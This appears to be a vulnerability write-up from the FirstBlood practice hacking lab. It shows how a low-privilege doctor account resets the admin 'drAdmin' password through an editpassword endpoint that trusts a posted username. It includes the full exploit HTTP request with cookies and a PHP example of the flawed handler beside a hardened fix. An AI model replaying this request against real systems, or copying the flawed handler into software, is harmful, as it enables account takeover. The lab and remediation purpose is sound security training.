FirstBlood-#662 — It is possible to reset drAdmin's password
This issue was discovered on FirstBlood v2
On 2021-10-27, vigilante Level 4 reported:
Summary:
The admin user "drAdmin" is already configured but we don't have the password for it. We can register as a standard user and reset drAdmin's password.
When logged in as a normal user, we can see a snippet of code that indicates there's a password reset functionality.
/drpanel/index.php
/* to do
function editpassword(username) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", '', true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.onreadystatechange = function() {
        if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
            alert(this.responseText);
        } else {
        }
    }
    xhr.send();
} */
To reset drAdmin's password we just need to send a POST request and guess the name of the right endpoint.
Steps to Reproduce:
- Register a new Doctors account by using "test" as the unique invite code.
This is covered in my previous report id=377.
- Navigate to https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/drpanel/index.php and see the snippet of code mentioned earlier.
- Open the previous GET request, send it to Burp Repeater and modify the following. We're doing this to have the auth cookies included in the request.
- Change request method. This will change GET to POST.
- Modify the endpoint to /drpanel/drapi/editpassword.php
- Add the payload "username=dradmin&password=dradmin"
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: d8a1eeb46146-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=a8100fb5e4101c701b23b66ca
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/login.php?action=login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
username=dradmin&password=dradmin
- We've received a new password for drAdmin's account and verified that we can log in.
Password updated - RLMzAqTlm8BUG2v
Screenshots:
Impact
A new doctor's account with limited functionality is able to reset the true admin account's password.
P1 CRITICAL
Endpoint: drpanel/drapi/editpassword.php
This report contains multiple vulnerabilities:
FirstBlood ID: 24
Vulnerability Type: Auth issues
The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admin's password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in, as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
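The authorization gap behind FirstBlood ID 27, illustrated with added PHP that is not FirstBlood's own code: the first handler resets whichever account the posted username names (the report's request used lowercase "dradmin" and reset "drAdmin", so the lookup is evidently case-insensitive), while the hardened handler takes the account from the server-side session, demands the current password and a CSRF token, and returns one error message for both a wrong user and a wrong password. The `$db` PDO handle, the `users` table columns and the session keys are assumptions.

```php
<?php
// Added illustration, not FirstBlood's code. Assumes a PDO handle $db and a
// `users` table (username, password_hash), plus a session that stores the
// authenticated doctor's username and a CSRF token.

// VULNERABLE (the behaviour the report describes): any logged-in doctor can
// post username=dradmin and the server resets that account's password.
function editpassword_vulnerable(PDO $db, array $post): string {
    $target = $post['username'] ?? '';
    $newPassword = bin2hex(random_bytes(8));   // server-generated, as in the report's response
    $stmt = $db->prepare('UPDATE users SET password_hash = ? WHERE LOWER(username) = LOWER(?)');
    $stmt->execute([password_hash($newPassword, PASSWORD_DEFAULT), $target]);
    return $stmt->rowCount() ? "Password updated - $newPassword" : 'No such user';
}

// HARDENED: the account to change comes from the session, never from the
// request body, and the caller must prove the current password.
function editpassword_hardened(PDO $db, array $session, array $post): string {
    if (empty($session['username'])) {
        http_response_code(401);
        return 'Not authenticated';
    }
    if (!hash_equals($session['csrf_token'] ?? '', $post['csrf_token'] ?? '')) {
        http_response_code(403);
        return 'Bad CSRF token';
    }
    $username = $session['username'];
    $current  = $post['current_password'] ?? '';
    $new      = $post['new_password'] ?? '';

    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // One message for "no such user" and "wrong password" so nothing is enumerable.
    if (!$row || !password_verify($current, $row['password_hash'])) {
        http_response_code(403);
        return 'Current password incorrect';
    }
    if (strlen($new) < 12) {
        return 'New password too short';
    }
    $upd = $db->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
    $upd->execute([password_hash($new, PASSWORD_DEFAULT), $username]);
    return 'Password updated';
}

if (isset($db) && $_SERVER['REQUEST_METHOD'] === 'POST') {
    echo editpassword_hardened($db, $_SESSION ?? [], $_POST);
}
```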